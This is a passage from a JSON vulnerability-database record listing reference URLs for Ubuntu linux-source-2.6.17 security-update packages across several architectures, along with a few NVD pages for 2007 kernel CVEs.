        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1353"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0005"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.39_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.39_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1000"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.39_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb"
      },
      {
        "trust": 0.1,
